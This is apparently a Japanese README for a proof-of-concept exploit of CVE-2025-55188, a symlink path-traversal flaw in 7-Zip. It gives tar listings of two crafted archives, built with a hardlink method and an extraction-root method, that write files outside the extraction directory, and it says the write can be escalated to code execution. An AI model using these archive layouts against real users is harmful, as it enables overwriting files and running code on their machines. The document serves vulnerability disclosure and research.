
CVE-2025-55188の概念実証エクスプロイト。シンボリックリンクパストラバーサルによる7-Zipでの任意ファイル書き込みを示し、任意コード実行に昇格。
CVE-2025-55188 (7-Zip の任意ファイル書き込み) の Proof-of-concept。2025年8月3日にリリースされたバージョン 25.01 で修正されました。
注: CVE-2025-55188 は CVE-2025-11001 とは異なります。
CVE-2025-11001 が修正されたバージョン (バージョン 25.00) は、依然として脆弱です CVE-2025-55188 によるシンボリックリンク攻撃を介した任意コード実行に対して。
CVE-2025-55188 は、CVE-2025-11001 の公開より前に発見され、公開されました。
より詳細な説明と解析記事については、https://lunbun.dev/blog/cve-2025-55188/ を参照してください。
この脆弱性はかなり単純です。
パストラバーサルは、シンボリックリンクを介して任意のファイルに書き込むことで実行されます。そこから、重要なファイルに書き込むことで、任意ファイル書き込みを任意コード実行に昇格させることができます。
シンボリックリンクのパストラバーサルが可能になるのは、シンボリックリンクの安全性チェックにおけるエッジケースのためです。これを行う方法を2つ見つけました。詳細はブログ記事を参照してください。
次の .tar ファイルは、展開時に ../a/b/file.txt に書き込みます。
$ tar -tvf write.tar
lrw-r--r-- 0/0 0 1969-12-31 16:00 a/link -> ../a/b
hrwxr-xr-x 0/0 0 1969-12-31 16:00 link link to a/link
-rw-r--r-- 0/0 44 1969-12-31 16:00 link/file.txt
poc_hardlink には、ハードリンク方式を使用するコードが含まれています。
次の .tar ファイルは、展開時に ../file.txt に書き込みます (Linux のみ)。
$ tar -tvf write.tar
lrw-r--r-- 0/0 0 1969-12-31 16:00 a/b/link -> /a
lrw-r--r-- 0/0 0 1969-12-31 16:00 link -> a/b/link/../../
-rw-r--r-- 0/0 44 1969-12-31 16:00 link/file.txt
poc_extraction_root には、展開ルート方式を使用するコードが含まれています。